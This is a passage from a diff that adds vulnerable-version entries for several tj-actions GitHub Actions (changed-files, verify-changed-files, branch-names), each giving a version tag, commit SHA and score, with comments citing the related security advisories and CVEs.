"41"] + - ["tj-actions/changed-files", "v35.5.4", "74338865c1e73fee674ce5cfc5d28f4b9caa33bc", "41"] + - ["tj-actions/changed-files", "v35.5.3", "d5414fd30b0b7618c815fe7ebe5673720e081937", "41"] + - ["tj-actions/changed-files", "v35.5.2", "7f2aa19bdcf4a00195671e368091a1e32a694ac5", "41"] + - ["tj-actions/changed-files", "v35.5.1", "210cc839c24f532fe4fbf510b7b3314ca9a2b90b", "41"] + - ["tj-actions/changed-files", "v35.5.0", "db3ea27a0cf07135175be5efe7aaf84df6e0e6f0", "41"] + - ["tj-actions/changed-files", "v35.4.4", "57d9664f8e2aa45f26bcb59095f99aa47ae8e90d", "41"] + - ["tj-actions/changed-files", "v35.4.3", "0953088baa540166372190bec608cad1603a787d", "41"] + - ["tj-actions/changed-files", "v35.4.2", "0562b9f865df79542dfcd59cfbd14c9ac9a792d3", "41"] + - ["tj-actions/changed-files", "v35.4.1", "487675b843e203b5c9a92a07f1ed763d046d7283", "41"] + - ["tj-actions/changed-files", "v35.4.0", "9a6dabf8d15381f97f1c770257a1a0db59c28a47", "41"] + - ["tj-actions/changed-files", "v35.3.2", "7839ede089e483df865be448d6f3652f875005e0", "41"] + - ["tj-actions/changed-files", "v35.3.1", "c2296c1b044b4f5c97d310a6d31e95cbcb5583ec", "41"] + - ["tj-actions/changed-files", "v35.3.0", "ea251d4d2f03a9c18841ae1b752f58b82dfb4d5e", "41"] + - ["tj-actions/changed-files", "v35.2.1", "1d1287f9fafd92be283f99b781fb5f00f00dd471", "41"] + - ["tj-actions/changed-files", "v35.2.0", "392359fc8c85be1a8752e9ab6b1ad9e45158b4a9", "41"] + - ["tj-actions/changed-files", "v35.1.2", "7f33882a1271950f8592f96b77e694436bfee83b", "41"] + - ["tj-actions/changed-files", "v35.1.1", "1d8a2f91371fd14ec6146c37cbae79526144fbe9", "41"] + - ["tj-actions/changed-files", "v35.1.0", "0626c3f94002c0a9d7491dd7fed7055bbdff6f92", "41"] + - ["tj-actions/changed-files", "v35.0.1", "a2b1e5dbb92d21753cf198228fbf2d0a8557f117", "41"] + - ["tj-actions/changed-files", "v35.0.0", "110b9baa5fc65597d65c1d019c6d3aee16d00c53", "41"] + - ["tj-actions/changed-files", "v35", "039afcd1024c210363c9d3fc8fd07e1f3fcf2867", "41"] + - ["tj-actions/changed-files", "v35-sec", "7e64030c44ffb4a2e8199e7e105943eb108db836", "41"] + - ["tj-actions/changed-files", "v34.6.2", "ce4b8e3cba2220de8132ac9721ff754efd6bb7d7", "41"] + - ["tj-actions/changed-files", "v34.6.1", "3b6c057cd82d1dafab565df2ba9fa489574a03b8", "41"] + - ["tj-actions/changed-files", "v34.6.0", "4f64429e8be26fe81a594635b07ed829581ea847", "41"] + - ["tj-actions/changed-files", "v34.5.4", "3f1e44af6ca48144748dfc62a7a6fb22e4ca67f3", "41"] + - ["tj-actions/changed-files", "v34.5.3", "74dc2e8a7877b725678a2195226bd470f10c481b", "41"] + - ["tj-actions/changed-files", "v34.5.2", "8356a01788b5a36aa0319e74183f3237e020feac", "41"] + - ["tj-actions/changed-files", "v34.5.1", "baaf598b46c2d9eb97eb995c9f69d1967349155d", "41"] + - ["tj-actions/changed-files", "v34.5.0", "8a4cc4fbd67975557b6d85dd302f5f9400b9c92e", "41"] + - ["tj-actions/changed-files", "v34.4.4", "8a7336fb6f6bc00da867b745d3491de42ac0231b", "41"] + - ["tj-actions/changed-files", "v34.4.3", "3996bc3fded83a011dbfc57f379fd31266770b3a", "41"] + - ["tj-actions/changed-files", "v34.4.2", "ef0a29048c50f844e30fac9fef80956f9765aab8", "41"] + - ["tj-actions/changed-files", "v34.4.1", "3ebdc42d8ba53fedc5bef0f16181249ac58446fa", "41"] + - ["tj-actions/changed-files", "v34.4.0", "94e6fba8d802f0fa80db51937e8752e9c165ee26", "41"] + - ["tj-actions/changed-files", "v34.3.4", "3dbb79f46716e706df6be563a268df44b264b545", "41"] + - ["tj-actions/changed-files", "v34.3.3", "991e8b3aae0ebbe0614b15b05d14ccb92affa24a", "41"] + - ["tj-actions/changed-files", "v34.3.2", "72d3bb8b336df0723f5c9e9d5875c61bf7bdfe9f", "41"] + - ["tj-actions/changed-files", "v34.3.1", "72d3bb8b336df0723f5c9e9d5875c61bf7bdfe9f", "41"] + - ["tj-actions/changed-files", "v34.3.0", "5f89dc7d6eefdcb7323e773671fd3461a7c2f050", "41"] + - ["tj-actions/changed-files", "v34.2.2", "734bb168e38279dfc7aa2af5d5be3a1475427a99", "41"] + - ["tj-actions/changed-files", "v34.2.1", "d2e030b6ed85ce2db7ac1a4afc574640df8bca26", "41"] + - ["tj-actions/changed-files", "v34.2.0", "6ba3c59bc6825f1ad375d92a9e70c6b275db0ddd", "41"] + - ["tj-actions/changed-files", "v34.1.1", "d0e44775cd5572bb0ead1d7d2e399015644f7359", "41"] + - ["tj-actions/changed-files", "v34.1.0", "b91acef304123e58fd6671ab267d6b5e2a7f2ef3", "41"] + - ["tj-actions/changed-files", "v34.0.5", "12633630aba2ab48ec2ad8a3344dd736d61a7b89", "41"] + - ["tj-actions/changed-files", "v34.0.4", "71840771e95943b1ab0c8f8ae45aeb0a34458e2e", "41"] + - ["tj-actions/changed-files", "v34.0.3", "cbfb0fda5afcfbf4ef0ef854bf0d8210abd0866f", "41"] + - ["tj-actions/changed-files", "v34.0.2", "932dad31974f07bd23cab5870d45c6e5ad5c8b73", "41"] + - ["tj-actions/changed-files", "v34.0.1", "9f289689bb8364780830da00b69507b88b5a2f07", "41"] + - ["tj-actions/changed-files", "v34.0.0", "c4d29bf5b2769a725bcc9a723c498ba9c34c05b4", "41"] + - ["tj-actions/changed-files", "v34", "ce4b8e3cba2220de8132ac9721ff754efd6bb7d7", "41"] + - ["tj-actions/changed-files", "v33.0.0", "aa52cfcd81f1a00a6bf1241a8cad6adec4d80638", "41"] + - ["tj-actions/changed-files", "v33", "aa52cfcd81f1a00a6bf1241a8cad6adec4d80638", "41"] + - ["tj-actions/changed-files", "v32.1.2", "1d6e210c970d01a876fbc6155212d068e79ca584", "41"] + - ["tj-actions/changed-files", "v32.1.1", "8953e851a137075e59e84b5c15fbeb3617e82f15", "41"] + - ["tj-actions/changed-files", "v32.1.0", "8de562e9316b23c4473ad852e5fd4f7f2bac7bc8", "41"] + - ["tj-actions/changed-files", "v32.0.1", "7c640bd299646362775f9d02e156bc741f67453b", "41"] + - ["tj-actions/changed-files", "v32.0.0", "270645280afddc7e2cf3f4867089522c8f2f8f9a", "41"] + - ["tj-actions/changed-files", "v32", "1d6e210c970d01a876fbc6155212d068e79ca584", "41"] + - ["tj-actions/changed-files", "v31.0.3", "dd7c81416dd9ddc14c594f751cd92c661e13daee", "41"] + - ["tj-actions/changed-files", "v31.0.2", "528984a4f814905ea80ed2a3818afc97aef8b0de", "41"] + - ["tj-actions/changed-files", "v31.0.1", "75af1a47c484c669beec6a1d00fc9d1d78179725", "41"] + - ["tj-actions/changed-files", "v31.0.0", "5184a750a66da08aba414ca223aef75c055956a5", "41"] + - ["tj-actions/changed-files", "v31", "dd7c81416dd9ddc14c594f751cd92c661e13daee", "41"] + - ["tj-actions/changed-files", "v30.0.0", "402f3827f0f759df60b674e7f52a02d6f4a5af8b", "41"] + - ["tj-actions/changed-files", "v30", "402f3827f0f759df60b674e7f52a02d6f4a5af8b", "41"] + - ["tj-actions/changed-files", "v29.0.9", "f7a56405a89ea095c6230f10e7f1c49daab13b35", "41"] + - ["tj-actions/changed-files", "v29.0.8", "df4dacaa89cace34cd60d5e9580f041a041e5233", "41"] + - ["tj-actions/changed-files", "v29.0.7", "602081b5d9327a7770b4c447a4ee8984ae44e72e", "41"] + - ["tj-actions/changed-files", "v29.0.6", "6e12407521ea9b0d11a4b7ab09b40266bd39496a", "41"] + - ["tj-actions/changed-files", "v29.0.5", "c5c9b6ff9e75d84d8b69cbf82bcfbf61672ef91e", "41"] + - ["tj-actions/changed-files", "v29.0.4", "c41b7152594c4423f3787d26662239eb0ae027c0", "41"] + - ["tj-actions/changed-files", "v29.0.3", "60f4aabced9b4718c75acef86d42ffb631c4403a", "41"] + - ["tj-actions/changed-files", "v29.0.2", "82edb42dc4e3a5d5edf24cc3ae4b1f55c20cc220", "41"] + - ["tj-actions/changed-files", "v29.0.1", "18edda74753bbb7090ea030c1f80ef9610ebdff1", "41"] + - ["tj-actions/changed-files", "v29.0.0", "bec82ebb3493119ba317fcee8a0d1db09d39d1ac", "41"] + - ["tj-actions/changed-files", "v29", "f7a56405a89ea095c6230f10e7f1c49daab13b35", "41"] + - ["tj-actions/changed-files", "v28.0.0", "28ac6724247a133793509b5d165d58319b40a171", "41"] + - ["tj-actions/changed-files", "v28", "602cf940579b9a2b2db0aafe835bfdb675fac12c", "41"] + - ["tj-actions/changed-files", "v27", "5e56dcabdd4a97ea745791856930038be56d9b70", "41"] + - ["tj-actions/changed-files", "v26.1", "58ae566dc69a926834e4798bcfe0436ff97c0599", "41"] + - ["tj-actions/changed-files", "v26", "7394701157dae4adb4eaa75d8c99e9b2edff81fe", "41"] + - ["tj-actions/changed-files", "v25", "36e65a11651994e93d6f1ef3afa781c3dcbb9780", "41"] + - ["tj-actions/changed-files", "v24.1", "bf6ddb7db66f9da5b2cffeb28b2b696aacb26e1c", "41"] + - ["tj-actions/changed-files", "v24", "6c44eb8294bb9c93d6118427f4ff8404b695e1d7", "41"] + - ["tj-actions/changed-files", "v23.2", "b2ee165d6b42ab1740e1037eb93748aad96767c5", "41"] + - ["tj-actions/changed-files", "v23.1", "34a865a2b221bd60ec0d4c071f5e7a66ffdac88a", "41"] + - ["tj-actions/changed-files", "v23", "fb1fe28aa9ff24afc553b37545437005a4cf2115", "41"] + - ["tj-actions/changed-files", "v22.2", "ae90a0b602c90d598c0c027a519493c1a069543e", "41"] + - ["tj-actions/changed-files", "v22.1", "bc1dc8f54db8eeeaae00ab92737ab34926b9ad8d", "41"] + - ["tj-actions/changed-files", "v22", "3de1f9a283b61f308ee3045be4d301037657225a", "41"] + - ["tj-actions/changed-files", "v21", "0edfedf16d9ff0903cbe599d474a022823ca8fb8", "41"] + - ["tj-actions/changed-files", "v20.2", "205450238e81d3da0e0ec2d776f58c12846fddfb", "41"] + - ["tj-actions/changed-files", "v20.1", "944a8b89098b24b0723ed9264888eb7fcffbbe9a", "41"] + - ["tj-actions/changed-files", "v20", "581eef0495dd5b75a3dd93047ff9f0d42dc09370", "41"] + - ["tj-actions/changed-files", "v19.3", "e55f7fb99e90111108bc24d3f14156b06ab6a12c", "41"] + - ["tj-actions/changed-files", "v19.2", "07b38ce1a17c46f1d0eb1150c8a33f703d473262", "41"] + - ["tj-actions/changed-files", "v19.1", "d26252004aa87df12f72411feec056907ecdbadc", "41"] + - ["tj-actions/changed-files", "v19", "a6d456f542692915c5289ea834fb89bc07c11208", "41"] + - ["tj-actions/changed-files", "v18.7", "a59f800cbb60ed483623848e31be67659a2940f8", "41"] + - ["tj-actions/changed-files", "v18.6", "a2f1692a6f703b7a14e155ae404e6bb15538b763", "41"] + - ["tj-actions/changed-files", "v18.5", "72aab29255d4fd553ccf1c0fa3223dcc62a2fd84", "41"] + - ["tj-actions/changed-files", "v18.4", "e35d0afdc1f0b01f84ec0f4cdf1b179325634b36", "41"] + - ["tj-actions/changed-files", "v18.3", "081ee9cc54a7ded6c421c632f23a31dbbe34a5f3", "41"] + - ["tj-actions/changed-files", "v18.2", "1f30bd2085b83668fb636f1a1f90744d8adbacca", "41"] + - ["tj-actions/changed-files", "v18.1", "227e314ad84036340cab47e649d91b012275a53c", "41"] + - ["tj-actions/changed-files", "v18", "ffd30e8dd820b89653c2298acf0447d29dbd0f16", "41"] + - ["tj-actions/changed-files", "v17.3", "f5a8de7d36c5909d300d7fcc8d6340d2a56ab9d9", "41"] + - ["tj-actions/changed-files", "v17.2", "0bc7d4006fb085334217ec5d6e6c288daade2f59", "41"] + - ["tj-actions/changed-files", "v17.1", "a53d74f700f2982646d538e66ce35cbfc8d4e826", "41"] + - ["tj-actions/changed-files", "v17", "933541631c41bad3fe20bdbd440ec68afa9a9518", "41"] + - ["tj-actions/changed-files", "v16", "4daffbaee17b34b8ae544990906277485819cc16", "41"] + - ["tj-actions/changed-files", "v15.1", "4b1f26aed507a21569666773e1c753dfe409d806", "41"] + - ["tj-actions/changed-files", "v15", "09441d38eaf8b76cbe2c42e256f46dfb432f63a4", "41"] + - ["tj-actions/changed-files", "v14.7", "e44053b6a0e8e7df1aa50a171c46601c605f61bb", "41"] + - ["tj-actions/changed-files", "v14.6", "c0dba8199070f01fcea9cd3a4dc42b365f06bf8d", "41"] + - ["tj-actions/changed-files", "v14.5", "fd2e9917c337ba7e2222d5aa9e32b27a57a71d14", "41"] + - ["tj-actions/changed-files", "v14.4", "2a8a501ad614cd775a2c07537b555783496dc085", "41"] + - ["tj-actions/changed-files", "v14.3", "a8ea7202c1c248d93235e87cc59e5b3a9881f558", "41"] + - ["tj-actions/changed-files", "v14.2", "88edda5361ed308226d6cb938eaa8b18182750f5", "41"] + - ["tj-actions/changed-files", "v14.1", "be68c10267c4979ed30c9397041b052b2980f91f", "41"] + - ["tj-actions/changed-files", "v14", "b59431bc7d44f9e8951a290fc7d48879f2ca1939", "41"] + - ["tj-actions/changed-files", "v13.2", "68bd279d40fb5bfc976429283b060c6ee426f63c", "41"] + - ["tj-actions/changed-files", "v13.1", "2c85495a7bb72f2734cb5181e29b2ee5e08e61f7", "41"] + - ["tj-actions/changed-files", "v13", "f276697f3b86a1d897052524507c59f5e173ccd1", "41"] + - ["tj-actions/changed-files", "v12.2", "00f80efd45353091691a96565de08f4f50c685f8", "41"] + - ["tj-actions/changed-files", "v12.1", "f56e736bedd192c12951db94e83a440885d04eb1", "41"] + - ["tj-actions/changed-files", "v12", "019a09d36e5b592a6770a9a71ef1b3efd9a85d37", "41"] + - ["tj-actions/changed-files", "v11.9", "3b638a970886ec84db14ad956bb4df9766bd7c50", "41"] + - ["tj-actions/changed-files", "v11.8", "b42f932be5b3fee4a990cb3e03478d5da2d4293b", "41"] + - ["tj-actions/changed-files", "v11.7", "8dfe0ee3f4840f84a7947b5288b19d7a583755ae", "41"] + - ["tj-actions/changed-files", "v11.6", "aae164d51be780a235cdeea89752bbacbbfee3c3", "41"] + - ["tj-actions/changed-files", "v11.5", "09a879748c548705ec26508c030b11aad9b5097a", "41"] + - ["tj-actions/changed-files", "v11.4", "b54a7ae7259d0729d0b582bac28b05462f16cd64", "41"] + - ["tj-actions/changed-files", "v11.3", "902e60737927ccef3713faad3752d84f1153d7ac", "41"] + - ["tj-actions/changed-files", "v11.2", "2b51570d5f086eb07a1e527a182773b2045ec26b", "41"] + - ["tj-actions/changed-files", "v11.1", "040111b36775c1033b4703b77f9c5c203da18936", "41"] + - ["tj-actions/changed-files", "v11", "3b638a970886ec84db14ad956bb4df9766bd7c50", "41"] + - ["tj-actions/changed-files", "v10.1", "1d34e69895b85e643b9b259d54f395f0d1e27c10", "41"] + - ["tj-actions/changed-files", "v10", "b86b537e2b78397b630cfb1a8d0aec1e03379737", "41"] + - ["tj-actions/changed-files", "v9.3", "2a771ad30d623c27165b3677688ebe3f17c49f65", "41"] + - ["tj-actions/changed-files", "v9.2", "75933dc40b241db3752ed4c9e2f24cb7cfff51f9", "41"] + - ["tj-actions/changed-files", "v9.1", "2c0d12b627191145ce31c2a098d8d37e93b35861", "41"] + - ["tj-actions/changed-files", "v9", "7abdbc94e90b9a9b002ad86d8d2a5f9472c3c75c", "41"] + - ["tj-actions/changed-files", "v8.9", "675ab58887b9ae58d77d4dcd2d5e58228ab5f185", "41"] + - ["tj-actions/changed-files", "v8.8", "8c6f276ea5961fa51474aaa203c6d06226acbaa8", "41"] + - ["tj-actions/changed-files", "v8.7", "d825b1f7094e756ca34581aaab611003eaa23975", "41"] + - ["tj-actions/changed-files", "v8.6", "0bd70b7aecded5f2eb1f0498c3692433f2453b37", "41"] + - ["tj-actions/changed-files", "v8.5", "0fe67a1f15b48dcd40e7ea0dfdd4afc9418febf0", "41"] + - ["tj-actions/changed-files", "v8.4", "7bfa539f0d6ed4331d2899e7440a1946929829c1", "41"] + - ["tj-actions/changed-files", "v8.3", "d679de9200b28e963362cba99095dd8d9f23d446", "41"] + - ["tj-actions/changed-files", "v8.2", "1e10ed49507767257514a643ca1baab24a5496af", "41"] + - ["tj-actions/changed-files", "v8.1", "0754fdabe31b721683e1ffc719584df67ad24c87", "41"] + - ["tj-actions/changed-files", "v8", "d290bdd91e68dcf1bafe3fa63280666077cbc61c", "41"] + - ["tj-actions/changed-files", "v7", "15b1769fc52da64fe168a41ccb01c48b27687149", "41"] + - ["tj-actions/changed-files", "v6.3", "2ecd06deb6721d96fd1da0369fc6be39e974edba", "41"] + - ["tj-actions/changed-files", "v6.2", "5fe8e4d60450bbe483ca011b747c4a972a79ef07", "41"] + - ["tj-actions/changed-files", "v6.1", "7c66aa285d3ec22f1b8442b9a498ebb76ca5f57b", "41"] + - ["tj-actions/changed-files", "v6", "2ecd06deb6721d96fd1da0369fc6be39e974edba", "41"] + - ["tj-actions/changed-files", "v5.3", "e95bba87d2bd0b2bab4094abd9755a74f16703e6", "41"] + - ["tj-actions/changed-files", "v5.2", "7852058eeee10d857e59ce41f3cb465a70c96ae0", "41"] + - ["tj-actions/changed-files", "v5.1", "81f32e24026825ecfb7cb5d3951f91cfe788b0ad", "41"] + - ["tj-actions/changed-files", "v5.0.0", "450eadf5a0462f8d0b5e99d07d4b6d8f7358420c", "41"] + - ["tj-actions/changed-files", "v5", "0e956bb09e9b05df440a2459a041cdec3cc0cc0c", "41"] + - ["tj-actions/changed-files", "v4.4", "300e935beb285fcda513be84333e8726d5a544fb", "41"] + - ["tj-actions/changed-files", "v4.3", "fcb2ab8c32c2b66fdf94ab3deede353f8fe6f77c", "41"] + - ["tj-actions/changed-files", "v4.2", "271bbd60fedbc83dbb8cb00ce88bb4532d940e2f", "41"] + - ["tj-actions/changed-files", "v4.1", "e8ace0110cd60a2a0a729d52078ad6cec839dbb9", "41"] + - ["tj-actions/changed-files", "v4.0.7", "473984bd85c24f1fe61c0494d317cc7d490e1235", "41"] + - ["tj-actions/changed-files", "v4.0.6", "032f37fd241eeaf66ead8120552a3c6a157d1f22", "41"] + - ["tj-actions/changed-files", "v4.0.5", "3a35bdf667b36191faf1eea2b8c2cfbb8890bd25", "41"] + - ["tj-actions/changed-files", "v4.0.4", "c2216f65fdd828a28c41d6c97d242ec39ed694f3", "41"] + - ["tj-actions/changed-files", "v4.0.3", "0f16c26f3d5699a26be12446509c537ee964c1a8", "41"] + - ["tj-actions/changed-files", "v4.0.2", "271468ecafc0c12c5f0ce364317a640a5668eba7", "41"] + - ["tj-actions/changed-files", "v4.0.1", "fb063fc7d459d8ee25f9b3ed48ec83bc5c51df72", "41"] + - ["tj-actions/changed-files", "v4.0.0", "a05436ffa9505d25707f781260a99d01cebd0d13", "41"] + - ["tj-actions/changed-files", "v4", "c061ef1fa3d028267a34edff2d42a34c8d56ec53", "41"] + - ["tj-actions/changed-files", "v3.3", "489e2d514f3a230d66dbf74efec7ceed7b171703", "41"] + - ["tj-actions/changed-files", "v3.2", "8d5a33c6034b0991a3fe85b2e73012a689eadf92", "41"] + - ["tj-actions/changed-files", "v3.1", "fbfaba544e2ae235b2f88c936bcd5f8aa12419cc", "41"] + - ["tj-actions/changed-files", "v3.0.2", "1980f551b48196e1d8aa48fbfd924cedde0d3e13", "41"] + - ["tj-actions/changed-files", "v3.0.1", "a86b5608ded2e43fee87cbbde6394e0be7f46a41", "41"] + - ["tj-actions/changed-files", "v3.0.0", "f917cc3459f79321da6af2a153cb91ce82a34aaf", "41"] + - ["tj-actions/changed-files", "v3", "e18ccae8fe477263087493451ea812d4d36faa4e", "41"] + - ["tj-actions/changed-files", "v2.1", "e1d275d6d3255d6a586052675d3c5cef793edccf", "41"] + - ["tj-actions/changed-files", "v2.0.1", "00f80efd45353091691a96565de08f4f50c685f8", "41"] + - ["tj-actions/changed-files", "v2.0.0", "9c1a181e67797cd053d15062eda07b2b322bbbfe", "41"] + - ["tj-actions/changed-files", "v2", "5eaa2d80dddfe7de6f7cc75fcaeb554851737685", "41"] + - ["tj-actions/changed-files", "v1.3.1", "188487d180e816622215bd011cbaca666af41ed9", "41"] + - ["tj-actions/changed-files", "v1.3.0", "30988915fa46789ba51cc1436c92488a52ac44ee", "41"] + - ["tj-actions/changed-files", "v1.2.2", "467d26c8b77612d9f7d20df5271edc207eae69a7", "41"] + - ["tj-actions/changed-files", "v1.2.1", "d9eb683b30e5b231c948331ad364b991fa8be544", "41"] + - ["tj-actions/changed-files", "v1.2.0", "09a879748c548705ec26508c030b11aad9b5097a", "41"] + - ["tj-actions/changed-files", "v1.1.3", "8e7cc77ab9c1bffc233f2f3023d1b89ed44c9af5", "41"] + - ["tj-actions/changed-files", "v1.1.2", "81ad4b874479c31a00285815995079e20c6c2779", "41"] + - ["tj-actions/changed-files", "v1.1.1", "5e2a2f192377df7d67537b0e788e1b53e8a76f12", "41"] + - ["tj-actions/changed-files", "v1.1.0", "1af9ab38306a2fa478c9772eabab167444dbc755", "41"] + - ["tj-actions/changed-files", "v1.0.3", "55a857d66a8e01f50a2a37d18239edde79b1668d", "41"] + - ["tj-actions/changed-files", "v1.0.2", "62a9200adfe8200623dcd28ca74973e82baa954c", "41"] + - ["tj-actions/changed-files", "v1.0.1", "b915d091052b9d35e7c200d1da10cc6e2ec266e2", "41"] + - ["tj-actions/changed-files", "v1.0.0", "f0751de6af436d4e79016e2041cf6400e0833653", "41"] + - ["tj-actions/changed-files", "v1", "eef94236f6b9dec768f89dc72b9e0b64e13bb36e", "41"] + + # tj-actions/verify-changed-files + # https://github.com/advisories/GHSA-ghm2-rq8q-wrhc + # CVE-2023-52137 + - ["tj-actions/verify-changed-files", "v16.1.1", "54e20d3c522fbeed99ebaf2e38a1eb33214c58ba", "17"] + - ["tj-actions/verify-changed-files", "v16.1.0", "a9b6fd340565065ad293625200630be7fd2b0f13", "17"] + - ["tj-actions/verify-changed-files", "v16.0.1", "30aa174f53f67ecd5dc8e190dfbe46392202e5a5", "17"] + - ["tj-actions/verify-changed-files", "v16.0.0", "7f1b21ceb7ef533b97b46e89e2f882ee5cb17ae0", "17"] + - ["tj-actions/verify-changed-files", "v16", "54e20d3c522fbeed99ebaf2e38a1eb33214c58ba", "17"] + - ["tj-actions/verify-changed-files", "v15.0.2", "0409e189c445fab593a10a28e19663f0b012b5a5", "17"] + - ["tj-actions/verify-changed-files", "v15.0.1", "7da22d0521c254e711e5988bd2c7d48c2948d137", "17"] + - ["tj-actions/verify-changed-files", "v15.0.0", "7016858e130743cc6c6b472849411d40aa8ae1ce", "17"] + - ["tj-actions/verify-changed-files", "v15", "0409e189c445fab593a10a28e19663f0b012b5a5", "17"] + - ["tj-actions/verify-changed-files", "v14.0.2", "7517b838f3a0d51de4b334a61ef1330672118927", "17"] + - ["tj-actions/verify-changed-files", "v14.0.1", "bad2f5d7fc7e6812ac48d7e7207025a5a4cc93d3", "17"] + - ["tj-actions/verify-changed-files", "v14.0.0", "3b573ace62e287c3d68e24e4de2ee0c6f6280d86", "17"] + - ["tj-actions/verify-changed-files", "v14", "7517b838f3a0d51de4b334a61ef1330672118927", "17"] + - ["tj-actions/verify-changed-files", "v13.2.0", "f557547e643700f439745119efed5aac390db75d", "17"] + - ["tj-actions/verify-changed-files", "v13.1", "9ed3155b72ba709881c967f75611fc5852f773b9", "17"] + - ["tj-actions/verify-changed-files", "v13", "f557547e643700f439745119efed5aac390db75d", "17"] + - ["tj-actions/verify-changed-files", "v12.0", "a3391b5a01114c49c3a8d55181a9ff4c99bf0db7", "17"] + - ["tj-actions/verify-changed-files", "v12", "a3391b5a01114c49c3a8d55181a9ff4c99bf0db7", "17"] + - ["tj-actions/verify-changed-files", "v11.1", "1d7ee9711b0a8f675208004e66bc25d593a1a0ae", "17"] + - ["tj-actions/verify-changed-files", "v11", "c4322970b4f055ede155b95586b04562796f83b7", "17"] + - ["tj-actions/verify-changed-files", "v10.1", "6e986dfff1f61105bc496287b5bbf0776092737e", "17"] + - ["tj-actions/verify-changed-files", "v10", "fa6ea307b32e5314d4a62b1209c3c782d5b5dcc9", "17"] + - ["tj-actions/verify-changed-files", "v9.2", "6f40ee1d523d9a9223204ae06919a3b2739702dc", "17"] + - ["tj-actions/verify-changed-files", "v9.1", "1b13d2556290c5ca5a94b7d042b91f3519c17d38", "17"] + - ["tj-actions/verify-changed-files", "v9", "c09bcad97929b17bacf737670bee312af98be94f", "17"] + - ["tj-actions/verify-changed-files", "v8.8", "fda469d6b456070da68fa3fdbc07a513d858b200", "17"] + - ["tj-actions/verify-changed-files", "v8.7", "bd1e271a8d26e249e0412899d4e3d8f5a89ecd6c", "17"] + - ["tj-actions/verify-changed-files", "v8.6", "367ba21c800e2a2b1451e272d24cf0caa3e4f9e4", "17"] + - ["tj-actions/verify-changed-files", "v8.5", "9dea97ec0f35d708d32dadd9b34a6af7cc28b19f", "17"] + - ["tj-actions/verify-changed-files", "v8.4", "c154cc6a77695d4483937745499e07fee62addd3", "17"] + - ["tj-actions/verify-changed-files", "v8.3", "527ff7533afca6e5bece96bd15a998f90f54c624", "17"] + - ["tj-actions/verify-changed-files", "v8.2", "e8756d59f6d66ad7376c293832e4d6eda8ae3257", "17"] + - ["tj-actions/verify-changed-files", "v8.1", "bcb4e766c132157cda3d1e8c7ca3d68d86d6ae6b", "17"] + - ["tj-actions/verify-changed-files", "v8", "25267f57f3afa6c59f1495e52da8b08c2c586606", "17"] + - ["tj-actions/verify-changed-files", "v7.2", "ea24bfd8ba4b019cb321502a4382a7a44b6ebc01", "17"] + - ["tj-actions/verify-changed-files", "v7.1", "f2a40baded88e47fa3f8e0f614832835194f4904", "17"] + - ["tj-actions/verify-changed-files", "v7", "197e12135dd5eaedd520a27882d17c1f384cf6a0", "17"] + - ["tj-actions/verify-changed-files", "v6.2", "a8f1b11a7c4dfc6706d8c64416dda0ef85d06e77", "17"] + - ["tj-actions/verify-changed-files", "v6.1", "95c26dda77430743cb3542d24b3e739417f5a881", "17"] + - ["tj-actions/verify-changed-files", "v6", "97ba4ccf1285bdfca165bc0b0a7cb1f994dae04e", "17"] + - ["tj-actions/verify-changed-files", "v5.7", "68310bb8f2a087df9f6ab1a2cc07c1e7cfc8ea28", "17"] + - ["tj-actions/verify-changed-files", "v5.6", "720ba6a5776e8687117603acab16000c0fc8868b", "17"] + - ["tj-actions/verify-changed-files", "v5.5", "cedd7096b7f23ae0307d7d82f516d666580579b3", "17"] + - ["tj-actions/verify-changed-files", "v5.4", "d68d3d232ffbba653ab0227d4bb2001cda681d12", "17"] + - ["tj-actions/verify-changed-files", "v5.3", "2e1153b8d1546dea7cd1a9db9834daceb72af17a", "17"] + - ["tj-actions/verify-changed-files", "v5.2", "c3dd6355e363eab778c129867f91da02e3285961", "17"] + - ["tj-actions/verify-changed-files", "v5.1", "81bd1de29366c53364b43cf83c4a4ddcab53b571", "17"] + - ["tj-actions/verify-changed-files", "v5", "31a9c7487cc1096253faa121489f4dbb32ca4132", "17"] + - ["tj-actions/verify-changed-files", "v4", "e981d37638f538ab477279c9f1fb6048462fd161", "17"] + - ["tj-actions/verify-changed-files", "v3.0.4", "e7f801cef44ca52e9aa496526dcd71daf5ef8437", "17"] + - ["tj-actions/verify-changed-files", "v3.0.3", "e86d0b9d1805c4e84fc90d4bcdab7371e14173d2", "17"] + - ["tj-actions/verify-changed-files", "v3.0.2", "ad255a4b81fa69c78f5fd1bb8ac95739dd3a9580", "17"] + - ["tj-actions/verify-changed-files", "v3.0.1", "3a8aed1f8847cc121e5f08e8963755154bb9df9e", "17"] + - ["tj-actions/verify-changed-files", "v3.0.gamma", "de910b5a2cdd6814c6e41d2b7c6f678eb75d430a", "17"] + - ["tj-actions/verify-changed-files", "v3.0.g", "d31b2a1fd119abbeddd18df3d95001a141b37372", "17"] + - ["tj-actions/verify-changed-files", "v3.0.beta", "e61c6fc5323423d2f0d9f04c7d15fa52af1084b0", "17"] + - ["tj-actions/verify-changed-files", "v3.0.b", "380890dc80695b7aa8047c0f824f87234defabd7", "17"] + - ["tj-actions/verify-changed-files", "v3.0.alpha", "873cfd676aea5e2a04b3f16706bd590effb5023e", "17"] + - ["tj-actions/verify-changed-files", "v3.0.a", "b0c60c86ab292cabeb4b4dc9f34c296c314fdfbb", "17"] + - ["tj-actions/verify-changed-files", "v3", "71831832d68f9fa5b527a9d692df35e1626ddfa2", "17"] + - ["tj-actions/verify-changed-files", "v2.0a", "6555389afba06cce81bc2f57a191d54f380ece0a", "17"] + - ["tj-actions/verify-changed-files", "v2", "9828a95864031bd113695ad5c68944163008d861", "17"] + - ["tj-actions/verify-changed-files", "v1.0.1", "8150cee7a747364d6b113cf8b0f59af88453a161", "17"] + - ["tj-actions/verify-changed-files", "v1", "48ddf88305af39076d425f86f0617d6f7ff23d58", "17"] + + # tj-actions/branch-names + # https://github.com/advisories/GHSA-8v8w-v8xg-79rf + # CVE-2023-49291 + - ["tj-actions/branch-names", "v7.0.6", "ab304d8562e2f137165e1d930e6d22d431189074", "7.07"] + - ["tj-actions/branch-names", "v7.0.5", "033f2358d95522973eee35810e35a86fae4a71d8", "7.07"] + - ["tj-actions/branch-names", "v7.0.4", "f7cfbc8edeb70a87ebec52e94fa8366f5077d0bc", "7.07"] + - ["tj-actions/branch-names", "v7.0.3", "309671a59e1143038c2a50f009b6adf301f6aa71", "7.07"] + - ["tj-actions/branch-names", "v7.0.2", "636cfe47b2002897ee4d3f07792c9fdd5d7dc725", "7.07"] + - ["tj-actions/branch-names", "v7.0.1", "4e532392367d7e4fb2f494f2d50c47562660cce5", "7.07"] + - 